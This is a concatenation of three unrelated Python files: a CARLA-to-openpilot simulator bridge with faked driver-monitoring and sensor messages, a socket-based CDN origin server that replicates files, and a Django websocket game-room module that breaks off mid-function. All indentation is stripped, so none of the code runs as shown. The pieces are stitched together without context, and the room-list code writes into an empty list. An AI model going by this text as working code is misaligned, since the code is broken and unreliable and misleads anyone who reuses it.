# reference model? (how does reference model work?) (may drive along different routes?) state-machine is white-box based? example other than traffic light
# difference with apollo dreamland?
# apollo6.0?
def steer_rate_limit(old, new):
# Rate limiting to 0.5 degrees per step
limit = 0.5
if new > old + limit:
return old + limit
elif new < old - limit:
return old - limit
else:
return new
frame_id = 0
def cam_callback(image, sub_folder='data_folder/front'):
global frame_id
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0, 1, 2]].copy()
dat = messaging.new_message('roadCameraState')
dat.roadCameraState = {
"frameId": image.frame,
"image": img.tobytes(),
"transform": [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0]
}
pm.send('roadCameraState', dat)
frame_id += 1
# addition
if frame_id % SAVE_DATA_PER_FRAMES == 0:
plt.imsave(os.path.join(sub_folder, str(frame_id)+'.jpg'), img[:, :, [2, 1, 0]])
# addition:
def other_cam_callback(image, sub_folder='data_folder/top'):
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0, 1, 2]].copy()
if frame_id % SAVE_DATA_PER_FRAMES == 0:
plt.imsave(os.path.join(sub_folder, str(frame_id)+'.jpg'), img[:, :, [2, 1, 0]])
def imu_callback(imu, vehicle_state):
vehicle_state.bearing_deg = math.degrees(imu.compass)
dat = messaging.new_message('sensorEvents', 2)
dat.sensorEvents[0].sensor = 4
dat.sensorEvents[0].type = 0x10
dat.sensorEvents[0].init('acceleration')
dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
# copied these numbers from locationd
dat.sensorEvents[1].sensor = 5
dat.sensorEvents[1].type = 0x10
dat.sensorEvents[1].init('gyroUncalibrated')
dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
pm.send('sensorEvents', dat)
def panda_state_function():
pm = messaging.PubMaster(['pandaState'])
while 1:
dat = messaging.new_message('pandaState')
dat.valid = True
dat.pandaState = {
'ignitionLine': True,
'pandaType': "blackPanda",
'controlsAllowed': True,
'safetyModel': 'hondaNidec'
}
pm.send('pandaState', dat)
time.sleep(0.5)
def gps_callback(gps, vehicle_state):
dat = messaging.new_message('gpsLocationExternal')
# transform vel from carla to NED
# north is -Y in CARLA
velNED = [
-vehicle_state.vel.y, # north/south component of NED is negative when moving south
vehicle_state.vel.x, # positive when moving east, which is x in carla
vehicle_state.vel.z,
]
dat.gpsLocationExternal = {
"flags": 1, # valid fix
"verticalAccuracy": 1.0,
"speedAccuracy": 0.1,
"vNED": velNED,
"bearingDeg": vehicle_state.bearing_deg,
"latitude": gps.latitude,
"longitude": gps.longitude,
"altitude": gps.altitude,
"source": log.GpsLocationData.SensorSource.ublox,
}
pm.send('gpsLocationExternal', dat)
def fake_driver_monitoring():
pm = messaging.PubMaster(['driverState','driverMonitoringState'])
while 1:
# dmonitoringmodeld output
dat = messaging.new_message('driverState')
dat.driverState.faceProb = 1.0
pm.send('driverState', dat)
# dmonitoringd output
dat = messaging.new_message('driverMonitoringState')
dat.driverMonitoringState = {
"faceDetected": True,
"isDistracted": False,
"awarenessStatus": 1.,
}
pm.send('driverMonitoringState', dat)
time.sleep(DT_DMON)
def can_function_runner(vs):
i = 0
while 1:
# modification:
can_function(pm, vs.speed, vs.angle, i, vs.cruise_button, vs.is_engaged, vs.radar_data)
time.sleep(0.01)
i+=1
def bridge(q):
automatic = False
visualize_radar = True
# setup CARLA
client = carla.Client("127.0.0.1", 2000)
client.set_timeout(10.0)
world = client.load_world(args.town)
settings = world.get_settings()
settings.fixed_delta_seconds = 0.025
world.apply_settings(settings)
if args.low_quality:
world.unload_map_layer(carla.MapLayer.Foliage)
world.unload_map_layer(carla.MapLayer.Buildings)
world.unload_map_layer(carla.MapLayer.ParkedVehicles)
world.unload_map_layer(carla.MapLayer.Particles)
world.unload_map_layer(carla.MapLayer.Props)
world.unload_map_layer(carla.MapLayer.StreetLights)
blueprint_library = world.get_blueprint_library()
world_map = world.get_map()
vehicle_bp = blueprint_library.filter('vehicle.tesla.*')[1]
spawn_points = world_map.get_spawn_points()
assert len(spawn_points) > args.num_selected_spawn_point, \
f'''No spawn point {args.num_selected_spawn_point}, try a value between 0 and
{len(spawn_points)} for this town.'''
# modification
if args.num_selected_spawn_point < 0:
# town03 circular
# spawn_point = carla.Transform(carla.Location(x=122, y=55.5, z=0.5), carla.Rotation(yaw=180))
# town06 left turn inner most
spawn_point = carla.Transform(carla.Location(x=315.5, y=252, z=0.3), carla.Rotation(yaw=360))
# town04 16 out-of-road
# spawn_point = carla.Transform(carla.Location(x=-154, y=-128, z=0.5), carla.Rotation(yaw=145))
# town04 01 out-of-road
# spawn_point = carla.Transform(carla.Location(x=384.6, y=-84.3, z=0.5), carla.Rotation(yaw=90))
# spawn_point = carla.Transform(carla.Location(x=385.6, y=-254.3, z=0.5), carla.Rotation(yaw=90))
else:
spawn_point = spawn_points[args.num_selected_spawn_point]
# right_turn
# spawn_point = carla.Transform(carla.Location(x=spawn_point.location.x, y=spawn_point.location.y, z=spawn_point.location.z+0.2), carla.Rotation(yaw=270))
vehicle = world.spawn_actor(vehicle_bp, spawn_point)
max_steer_angle = vehicle.get_physics_control().wheels[0].max_steer_angle
# make tires less slippery
# wheel_control = carla.WheelPhysicsControl(tire_friction=5)
physics_control = vehicle.get_physics_control()
physics_control.mass = 2326
# physics_control.wheels = [wheel_control]*4
physics_control.torque_curve = [[20.0, 500.0], [5000.0, 500.0]]
physics_control.gear_switch_time = 0.0
vehicle.apply_physics_control(physics_control)
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', '70')
blueprint.set_attribute('sensor_tick', '0.05')
transform = carla.Transform(carla.Location(x=0.8, z=1.13))
camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camera.listen(cam_callback)
vehicle_state = VehicleState()
# reenable IMU
imu_bp = blueprint_library.find('sensor.other.imu')
imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
imu.listen(lambda imu: imu_callback(imu, vehicle_state))
gps_bp = blueprint_library.find('sensor.other.gnss')
gps = world.spawn_actor(gps_bp, transform, attach_to=vehicle)
gps.listen(lambda gps: gps_callback(gps, vehicle_state))
# addition:
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', '100')
blueprint.set_attribute('sensor_tick', '0.05')
transform = carla.Transform(carla.Location(x=-7, z=4))
camera_top = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camera_top.listen(other_cam_callback)
blueprint = blueprint_library.find('sensor.other.radar')
blueprint.set_attribute('horizontal_fov', '30') #30, 90
blueprint.set_attribute('vertical_fov', '1')
blueprint.set_attribute('range', '174') #174, 60
blueprint.set_attribute('sensor_tick', '0.05')
blueprint.set_attribute('points_per_second', '12000')#12000
transform = carla.Transform(carla.Location(x=2.32, z=1.13))
radar = world.spawn_actor(blueprint, transform, attach_to=vehicle)
radar.listen(lambda radar_data: radar_callback(radar_data, world, vehicle, vehicle_state, visualize_radar=visualize_radar))
sensors = [camera, imu, gps, camera_top, radar]
weather = WEATHERS[-2]
world.set_weather(weather)
blueprint = 'vehicle.yamaha.yzf'
blueprint2 = 'vehicle.tesla.model3'
blueprint3 = 'vehicle.yamaha.yzf'
blueprint4 = 'vehicle.yamaha.yzf'
loc = vehicle.get_location()
rot = vehicle.get_transform().rotation
forward = rot.get_forward_vector()
right = rot.get_right_vector()
new_loc = loc + forward*6 + right*(-3.5)
new_loc2 = loc + forward*12 + right*(-3.5)
new_loc3 = loc + forward*18 + right*(3.5)
new_loc4 = loc + forward*24
new_loc5 = loc + forward*120 + right*(-3.5)
scene = 'leading vehicle'
if scene == 'multiple vehicle':
actors_info = [(blueprint, new_loc.x, new_loc.y, new_loc.z, rot.yaw, 10), (blueprint2, new_loc2.x, new_loc2.y, new_loc2.z, rot.yaw, 10), (blueprint3, new_loc3.x, new_loc3.y, new_loc3.z, rot.yaw, 10), (blueprint4, new_loc4.x, new_loc4.y, new_loc4.z, rot.yaw, 10)]
elif scene == 'leading vehicle':
actors_info = [(blueprint2, new_loc2.x, new_loc2.y, new_loc2.z, rot.yaw, 10)]
elif scene == 'vehicle change lane':
actors_info = [(blueprint2, new_loc5.x, new_loc5.y, new_loc5.z, rot.yaw, 10)]
elif scene == 'leading motorcycle':
actors_info = [(blueprint, new_loc2.x, new_loc2.y, new_loc2.z, rot.yaw, 3)]
elif scene == 'empty':
actors_info = []
actors_list = generate_actors(world, actors_info)
# modification
atexit.register(destroy, sensors, actors_list)
# launch fake car threads
threading.Thread(target=panda_state_function).start()
threading.Thread(target=fake_driver_monitoring).start()
threading.Thread(target=can_function_runner, args=(vehicle_state,)).start()
# can loop
rk = Ratekeeper(100, print_delay_threshold=0.05)
# init
throttle_ease_out_counter = REPEAT_COUNTER
brake_ease_out_counter = REPEAT_COUNTER
steer_ease_out_counter = REPEAT_COUNTER
vc = carla.VehicleControl(throttle=0, steer=0, brake=0, reverse=False)
is_openpilot_engaged = False
throttle_out = steer_out = brake_out = 0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0
old_steer = old_brake = old_throttle = 0
throttle_manual_multiplier = 0.7 #keyboard signal is always 1
brake_manual_multiplier = 0.7 #keyboard signal is always 1
steer_manual_multiplier = 45 * STEER_RATIO #keyboard signal is always 1
# addition:
saved_frame_id = -1
initial_speed = 0.01
vx = initial_speed * np.cos(np.deg2rad(rot.yaw))
vy = initial_speed * np.sin(np.deg2rad(rot.yaw))
initial_velocity = carla.Vector3D(x=vx, y=vy, z=0)
vehicle.set_target_velocity(initial_velocity)
initial = True
tm = client.get_trafficmanager(8006)
tm.set_random_device_seed(0)
activate_actors(actors_info, actors_list, tm)
_vehicle_lights = (
carla.VehicleLightState.Position | carla.VehicleLightState.LowBeam
)
if weather.sun_altitude_angle < 0.0:
vehicle.set_light_state(carla.VehicleLightState(_vehicle_lights))
vehicles_list = world.get_actors().filter("*vehicle*")
for v in vehicles_list:
v.set_light_state(carla.VehicleLightState(_vehicle_lights))
while 1:
# 1. Read the throttle, steer and brake from op or manual controls
# 2. Set instructions in Carla
# 3. Send current carstate to op via can
cruise_button = 0
throttle_out = steer_out = brake_out = 0.0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0.0
# --------------Step 1-------------------------------
if not q.empty():
message = q.get()
m = message.split('_')
print('m:', m[0], m[1])
if m[0] == "steer":
steer_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "throttle":
throttle_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "brake":
brake_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "reverse":
#in_reverse = not in_reverse
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "cruise":
if m[1] == "down":
cruise_button = CruiseButtons.DECEL_SET
is_openpilot_engaged = True
elif m[1] == "up":
cruise_button = CruiseButtons.RES_ACCEL
is_openpilot_engaged = True
elif m[1] == "cancel":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
throttle_out = throttle_manual * throttle_manual_multiplier
steer_out = steer_manual * steer_manual_multiplier
brake_out = brake_manual * brake_manual_multiplier
#steer_out = steer_out
# steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
old_throttle = throttle_out
old_brake = brake_out
# print('initial', initial, 'is_openpilot_engaged', is_openpilot_engaged, 'cruise_button', cruise_button, CruiseButtons.RES_ACCEL)
# addition
model_output = None
if is_openpilot_engaged:
sm.update(0)
throttle_op = sm['carControl'].actuators.gas #[0,1]
brake_op = sm['carControl'].actuators.brake #[0,1]
steer_op = sm['controlsState'].steeringAngleDesiredDeg # degrees [-180,180]
throttle_out = throttle_op
steer_out = steer_op
brake_out = brake_op
steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
# addition:
model_output = sm['modelV2']
fcw_data = sm['fcwData']
radard_data = sm['radardData']
else:
if throttle_out==0 and old_throttle>0:
if throttle_ease_out_counter>0:
throttle_out = old_throttle
throttle_ease_out_counter += -1
else:
throttle_ease_out_counter = REPEAT_COUNTER
old_throttle = 0
if brake_out==0 and old_brake>0:
if brake_ease_out_counter>0:
brake_out = old_brake
brake_ease_out_counter += -1
else:
brake_ease_out_counter = REPEAT_COUNTER
old_brake = 0
if steer_out==0 and old_steer!=0:
if steer_ease_out_counter>0:
steer_out = old_steer
steer_ease_out_counter += -1
else:
steer_ease_out_counter = REPEAT_COUNTER
old_steer = 0
# --------------Step 2-------------------------------
steer_carla = steer_out / (max_steer_angle * STEER_RATIO * -1)
steer_carla = np.clip(steer_carla, -1,1)
steer_out = steer_carla * (max_steer_angle * STEER_RATIO * -1)
old_steer = steer_carla * (max_steer_angle * STEER_RATIO * -1)
vc.throttle = throttle_out/0.6
vc.steer = steer_carla
vc.brake = brake_out
vehicle.apply_control(vc)
# --------------Step 3-------------------------------
vel = vehicle.get_velocity()
speed = math.sqrt(vel.x**2 + vel.y**2 + vel.z**2) # in m/s
vehicle_state.speed = speed
vehicle_state.vel = vel
vehicle_state.angle = steer_out
vehicle_state.cruise_button = cruise_button
vehicle_state.is_engaged = is_openpilot_engaged
# if rk.frame%PRINT_DECIMATION == 0:
# print("frame: ", "engaged:", is_openpilot_engaged, "; throttle: ", round(vc.throttle, 3), "; steer(c/deg): ", round(vc.steer, 3), round(steer_out, 3), "; brake: ", round(vc.brake, 3))
# addition
if frame_id % SAVE_DATA_PER_FRAMES == 0 and saved_frame_id!=frame_id:
with open(save_folder+'/'+'model_output.txt', 'a') as f_out:
loc = vehicle.get_location()
print_and_write(f_out, '-'*20+str(rk.frame)+','+str(frame_id)+'-'*10+'\n')
ego_car_status = {
"engaged": is_openpilot_engaged,
"speed": speed,
"steer_out": steer_out,
"steer_op": steer_op,
"throttle": round(vc.throttle, 3),
"brake": round(vc.brake, 3),
"location": (round(loc.x, 3), round(loc.y, 3)),
"yaw": round(vehicle.get_transform().rotation.yaw, 3)
}
print_and_write(f_out, 'ego car status:'+str(ego_car_status)+'\n')
if model_output and model_output.leads:
if len(actors_list) > 0:
lead_d_carla = collect_carla_data(vehicle, actors_list[0])
else:
lead_d_carla = None
lead_msg = model_output.leads[0]
lead_d_camera = {
"dRel": float(lead_msg.xyva[0] - RADAR_TO_CAMERA),
"yRel": float(-lead_msg.xyva[1]),
"vRel": float(lead_msg.xyva[2]),
"a": float(lead_msg.xyva[3]),
"dRelStd": float(lead_msg.xyvaStd[0]),
"yRelStd": float(lead_msg.xyvaStd[1]),
"vRelStd": float(lead_msg.xyvaStd[2]),
"aStd": float(lead_msg.xyvaStd[3]),
"prob": float(lead_msg.prob),
"t": float(lead_msg.t),
}
additional_info = {
"hardBrakePredicted": model_output.meta.hardBrakePredicted,
# "disengagePredictions": model_output.meta.disengagePredictions,
}
print_and_write(f_out, 'lead ground-truth: '+str(lead_d_carla)+'\n')
print_and_write(f_out, 'lead predicted camera'+str(lead_d_camera)+'\n')
# print_and_write(f_out, 'fcw_data:'+str(fcw_data)+'\n')
print_and_write(f_out, 'radard_data'+str(radard_data)+'\n')
print_and_write(f_out, 'additional_info:'+str(additional_info)+'\n')
# print_and_write(f_out, 'model_output_meta:'+str(model_output.meta)+'\n')
saved_frame_id = frame_id
# print('actor speed:', get_speed(actors_list[0]))
# addition:
if scene == 'vehicle change lane':
d = dist(vehicle, actors_list[0])
if d < 40:
# print('dist', d)
other_v = actors_list[0].get_velocity()
change_lane(actors_list[0], True, tm)
rk.keep_time()
def go(q: Any):
while 1:
try:
bridge(q)
except RuntimeError as e:
print(repr(e))
print("Restarting bridge...")
# addition
def getch():
import sys
import termios
from termios import (BRKINT, CS8, CSIZE, ECHO, ICANON, ICRNL, IEXTEN, INPCK,
ISTRIP, IXON, PARENB, VMIN, VTIME)
from typing import Any
# Indexes for termios list.
IFLAG = 0
OFLAG = 1
CFLAG = 2
LFLAG = 3
ISPEED = 4
OSPEED = 5
CC = 6
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
# set
mode = termios.tcgetattr(fd)
mode[IFLAG] = mode[IFLAG] & ~(BRKINT | ICRNL | INPCK | ISTRIP | IXON)
#mode[OFLAG] = mode[OFLAG] & ~(OPOST)
mode[CFLAG] = mode[CFLAG] & ~(CSIZE | PARENB)
mode[CFLAG] = mode[CFLAG] | CS8
mode[LFLAG] = mode[LFLAG] & ~(ECHO | ICANON | IEXTEN)
mode[CC][VMIN] = 1
mode[CC][VTIME] = 0
termios.tcsetattr(fd, termios.TCSAFLUSH, mode)
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def keyboard_poll_thread_customized(q, start_time):
time.sleep(start_time)
count = 0
commands_list = [1, 1, 1, 1, 1, 1, 1, 1]
for command in commands_list:
time.sleep(1)
if command == 1:
print('put cruise up')
q.put("cruise_up")
elif command == 0:
print('put cruise down')
q.put("cruise_down")
else:
raise
while True:
c = getch()
# print("got %s" % c)
if c == '1':
q.put("cruise_up")
elif c == '2':
q.put("cruise_down")
elif c == '3':
q.put("cruise_cancel")
elif c == 'w':
q.put("throttle_%f" % 1.0)
elif c == 'a':
q.put("steer_%f" % 0.15)
elif c == 's':
q.put("brake_%f" % 1.0)
elif c == 'd':
q.put("steer_%f" % -0.15)
elif c == 'q':
exit(0)
if __name__ == "__main__":
# make sure params are in a good state
set_params_enabled()
msg = messaging.new_message('liveCalibration')
msg.liveCalibration.validBlocks = 20
msg.liveCalibration.rpyCalib = [0.0, 0.0, 0.0]
Params().put("CalibrationParams", msg.to_bytes())
from multiprocessing import Process, Queue
q: Any = Queue()
p = Process(target=go, args=(q,))
p.daemon = True
p.start()
if args.joystick:
# start input poll for joystick
from lib.manual_ctrl import wheel_poll_thread
wheel_poll_thread(q)
else:
# start input poll for keyboard
from lib.keyboard_ctrl import keyboard_poll_thread
# keyboard_poll_thread(q)
keyboard_poll_thread_customized(q, start_time=15)
|
originServer2.py
|
# 4 main components
# Serve edge servers
# Send heartbeat to backup
# Receive data from Content providers
# Replicate data to backup
from _thread import *
import socket
import sys
import time
import sched
from threading import Timer, Thread
import selectors
import os
from enum import Enum
import pickle
from threading import Timer, Thread, Lock
sys.path.insert(0, "../../")
from messages.content_related_messages import *
from messages.origin_heartbeat_message import *
from config import *
from edgeServer.edgeServer import md5
class ContentStatus:
INCOMPLETE = 0
UNSYNCED = 1
STORED = 2
class Content:
def __init__(self, content_id, filename, status):
self.content_id = content_id
self.filename = filename
self.status = status
####################################
# Global tables and lock variables #
####################################
content_dict = {}
content_dictL = Lock()
def dump():
global content_dict
f = open(ORIGIN_METADATA_FILENAME, 'wb')
pickle.dump(content_dict, f)
f.close()
def load():
global content_dict
f = open(ORIGIN_METADATA_FILENAME, 'rb')
content_dict = pickle.load(f)
f.close()
def print_dict():
global content_dict
for content in content_dict.values():
print(content.content_id, content.filename, content.status)
####################################
def synchronizer():
global content_dict, content_dictL
while(True):
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = ORIGIN_SERVER_IP_2
port = ORIGIN_SYNCHRONIZER_PORT_2
sock.bind((host, port))
sock.listen(1)
conn, addr = sock.accept()
print('Accepted', conn, 'from', addr)
print('Connected to other Origin Server')
while(True):
print("Looking for UNSYNCED files")
try:
for file in content_dict.values():
if file.status == ContentStatus.UNSYNCED:
# Sync this file
print("Syncing file", file.filename, "with content id", file.content_id)
file_size = int(os.stat('../data/'+file.filename).st_size)
file_des = FileDescriptionMessage(file.content_id,file_size,file.filename,md5('../data/'+file.filename))
print(file.content_id,file_size,file.filename,md5('../data/'+file.filename))
file_des.send(conn)
# receive response from other server
msg = OriginHeartbeatMessage(0)
msg.receive(conn)
if msg.file_exists:
content_dictL.acquire()
content_dict[file_des.content_id].status = ContentStatus.STORED
dump()
content_dictL.release()
continue
f = open('../data/'+file.filename, 'rb')
l = f.read(1018)
i = 0
while (l):
# if message.seq_no <= i:
msg = ContentMessage(file.content_id, i)
msg.data = l
msg.packet_size = len(l)
msg.send(conn)
i += 1
l = f.read(1018)
f.close()
content_dictL.acquire()
content_dict[file_des.content_id].status = ContentStatus.STORED
dump()
content_dictL.release()
time.sleep(ORIGIN_HEARTBEAT_TIME)
except Exception as e:
print(e)
break
def synchronize_receive():
global content_dict, content_dictL
host = ORIGIN_SERVER_IP_1
port = ORIGIN_SYNCHRONIZER_PORT_1
while(True):
while(True):
try:
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print('Socket successfully created')
sock.connect((host, port))
print("Connected to other server")
break
except:
print("Cannot connect to other server")
time.sleep(1)
continue
flag = 1
while(True):
try:
file_des = FileDescriptionMessage(0, 0, '', '')
file_des.receive(sock)
if file_des.received:
print("Receiving sync file details:")
print(file_des.file_name)
print(file_des.content_id)
print(file_des.file_size)
# check if file already exists and respond to the other server
if file_des.content_id in content_dict:
content = content_dict[file_des.content_id]
if content.status == ContentStatus.STORED:
file_exists = True
elif content.status == ContentStatus.UNSYNCED:
content_dictL.acquire()
content_dict[file_des.content_id].status = ContentStatus.STORED
dump()
content_dictL.release()
file_exists = True
else: # can check MD5 for incomplete files but unnecessary hassle :/
file_exists = False
else:
file_exists = False
msg = OriginHeartbeatMessage(file_exists)
msg.send(sock)
if file_exists:
continue
content_dictL.acquire()
content_dict[file_des.content_id] = Content(file_des.content_id, file_des.file_name, ContentStatus.INCOMPLETE)
dump()
content_dictL.release()
with open('../data/' + file_des.file_name, 'wb') as f:
print('file opened')
print("Content ID: ",file_des.content_id)
content_id = file_des.content_id
file_size = file_des.file_size
total_received=0
seq_no=0
while True:
msg = ContentMessage(content_id, seq_no)
try:
msg.receive(sock,file_size,total_received)
except Exception as e:
print("Last Sequence Number received: ",last_seq_number_recv)
print(e)
flag = 0
break
# return last_seq_number_recv
print("Sequence no: ",msg.seq_no)
last_seq_number_recv = msg.seq_no
data = msg.data
total_received+=len(data)
# print(len(data))
if not data:
break
f.write(data)
if flag == 0:
break
f.close()
content_dictL.acquire()
content_dict[file_des.content_id] = Content(file_des.content_id, file_des.file_name, ContentStatus.STORED)
dump()
content_dictL.release()
else:
print("Error receiving")
break
except Exception as e:
print(e)
def serve_edge_server_helper(conn, addr):
global content_dict
message = ContentRequestMessage(0, 0)
try:
message.receive(conn)
# Get filename from file
if message.received == False:
return
# Check if file is present in edge server
if message.content_id in content_dict:
filename = content_dict[message.content_id].filename
# before sending the file, send its details plus a checksum
file_size = int(os.stat('../data/'+filename).st_size)
print("filename: ",filename)
file_des = FileDescriptionMessage(message.content_id, file_size, filename, md5('../data/'+filename))
file_des.send(conn)
f = open('../data/'+filename, 'rb')
l = f.read(1018)
i = 0
while (l):
if message.seq_no <= i:
msg = ContentMessage(message.content_id, i)
msg.data = l
msg.packet_size = len(l)
msg.send(conn)
i += 1
l = f.read(1018)
f.close()
else:
# Get chunks of data from origin and send to client
pass
conn.close()
except Exception as e:
print(e)
def serve_edge_server():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Socket successfully created")
except socket.error as err:
print ("socket creation failed with error %s" %(err))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = ORIGIN_SERVER_PORT_2
s.bind(('', port))
print ("socket binded to %s" %(port))
s.listen(5)
threads = []
while True:
c, addr = s.accept()
print("Accepted connection from", addr)
t = Thread(target = serve_edge_server_helper, args = (c,addr))
threads.append(t)
t.start()
for t in threads:
t.join()
s.close()
def serve_content_provider_helper(c,addr):
global content_dict, content_dictL
file_des = FileDescriptionMessage(0, 0, '', '')
file_des.receive(c)
print(file_des.file_name)
print(file_des.content_id)
print(file_des.file_size)
content_dictL.acquire()
content_dict[file_des.content_id] = Content(file_des.content_id, file_des.file_name, ContentStatus.INCOMPLETE)
dump()
content_dictL.release()
with open('../data/'+file_des.file_name,'wb') as f:
recv_size = 0
file_size = file_des.file_size
while True:
mes = ContentMessage(0,0)
print('receiving data...')
mes.receive(c,file_size,recv_size)
print(mes.content_id)
print(mes.seq_no)
data = mes.data
if not data:
break
f.write(data)
recv_size+=len(data)
print("successfully received the file")
if md5('../data/'+file_des.file_name) == file_des.md5_val:
print("MD5 Matched!")
else:
print("MD5 didn't match")
content_dictL.acquire()
content_dict[file_des.content_id].status = ContentStatus.UNSYNCED
dump()
content_dictL.release()
print_dict()
c.close()
def serve_content_provider():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Socket successfully created")
except socket.error as err:
print ("socket creation failed with error %s" %(err))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = ORIGIN_CONTENT_PROVIDER_PORT_2
s.bind(('', port))
print ("socket binded to %s" %(port))
s.listen(5)
threads = []
while True:
c, addr = s.accept()
print("Accepted connection from", addr)
t = Thread(target = serve_content_provider_helper, args = (c,addr))
threads.append(t)
t.start()
for t in threads:
t.join()
c.close()
def popluate_content_dict():
global content_dict, content_dictL
content_dictL.acquire()
load()
content_dictL.release()
def main():
popluate_content_dict()
threads = []
t1 = Thread(target = synchronizer)
threads.append(t1)
t1.start()
t2 = Thread(target = serve_edge_server)
threads.append(t2)
t2.start()
t3 = Thread(target = serve_content_provider)
threads.append(t3)
t3.start()
t4 = Thread(target = synchronize_receive)
threads.append(t4)
t4.start()
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
web_socket.py
|
from channels.generic.websocket import WebsocketConsumer
from asgiref.sync import async_to_sync
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.views.decorators.csrf import csrf_exempt
import gevent
import platform
import django
import re
import json
import hashlib
import random
import base64
import time
import redis
import threading
import html
import unicodedata
import datetime
from . import GlobalVar, api_process, search_process
def string_toDatetime(st):
return datetime.datetime.strptime(st, "%Y-%m-%d %H:%M:%S")
def datetime_toString(dt):
return dt.strftime("%Y-%m-%d %H:%M:%S")
def htmlescape(str):
return (html.escape(str))
def is_number(s):
try:
float(s)
return True
except ValueError:
pass
try:
unicodedata.numeric(s)
return True
except (TypeError, ValueError):
pass
return False
def websocket_add(key, values):
tmp = GlobalVar.get_value('g_websocket_clients')
if not values in tmp:
tmp[key] = values
GlobalVar.set_value('g_websocket_clients', tmp)
def websocket_del(key):
tmp = GlobalVar.get_value('g_websocket_clients')
if key in tmp:
del tmp[key]
GlobalVar.set_value('g_websocket_clients', tmp)
def websocket_find(sec_key):
return GlobalVar.get_value('g_websocket_clients')[sec_key]
def send_player_leave_room(room_id, player_name):
result = {
'msgType': 'leave_room',
'name': player_name,
'roomid': room_id
}
json_encode = api_process.process_playerlist_encode(
result).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
redis_connect.publish('room', json_encode)
def send_match_was_finish(room_id):
result = {
'msgType': 'match_finifsh',
'name': '',
'roomid': room_id
}
json_encode = api_process.process_playerlist_encode(
result).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
redis_connect.publish('room', json_encode)
def send_player_join_room(room_id, player_name):
result = {
'msgType': 'join_room',
'name': player_name,
'roomid': room_id
}
json_encode = api_process.process_playerlist_encode(
result).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
redis_connect.publish('room', json_encode)
def send_player_ready(room_id, player_name):
result = {
'msgType': 'player_ready',
'name': player_name,
'roomid': room_id
}
json_encode = api_process.process_playerlist_encode(
result).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
redis_connect.publish('room', json_encode)
def send_match_server_crash(room_id):
result = {
'msgType': 'server_crash',
'name': '',
'roomid': room_id
}
json_encode = api_process.process_playerlist_encode(
result).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
redis_connect.publish('room', json_encode)
def get_players_by_id(roomid):
result = {
'msgType': 'get_room_player_number',
'number': 0,
'uFuck': 0,
'success': 1
}
room = GlobalVar.runSQL(
'SELECT * FROM roomlist WHERE `RoomID` = %s LIMIT 1', (roomid))
if not room:
result['uFuck'] = 1
return json.dumps(result)
number = room[0][GlobalVar.sql_roomlist_PlayerNumber]
result['number'] = number
return json.dumps(result)
def get_rand_roomlist():
# 前端最多容得下12个
result = {
'msgType': 'get_rand_roomlist',
'roomlist': 'null',
'success': 1
}
all_room = GlobalVar.runSQL(
'SELECT * FROM roomlist WHERE `StartSearch` = 0 AND `ingame` = 0 AND `PlayerNumber` < 5 AND `public` = 1')
if not all_room:
return json.dumps(result)
room_infos = {
# 'RoomID': {
# 'players': 0,
# 'ico': 'default.jpg',
# 'title': 'title',
# 'text': 'text',
# 'maps': []
# }
}
if len(all_room) <= 8:
for index in range(len(all_room)):
roomid = all_room[index][GlobalVar.sql_roomlist_RoomID]
room_config_decode = api_process.process_playerlist_decode(
all_room[index][GlobalVar.sql_roomlist_config])
room_infos[roomid] = {
'players': all_room[index][GlobalVar.sql_roomlist_PlayerNumber],
'ico': room_config_decode['ico'],
'title': room_config_decode['title'],
'text': room_config_decode['text'],
'maps': room_config_decode['maps']
}
else:
rand_number = []
raned_num = []
for index in range(0, 8):
rand = random.randint(0, len(all_room))
while rand in raned_num:
rand = random.randint(0, len(all_room))
rand_number[index] = rand
raned_num.append(rand_number[index])
for rand in range(len(raned_num)):
index = raned_num[rand]
roomid = all_room[index][GlobalVar.sql_roomlist_RoomID]
room_config_decode = api_process.process_playerlist_decode(
all_room[index][GlobalVar.sql_roomlist_config])
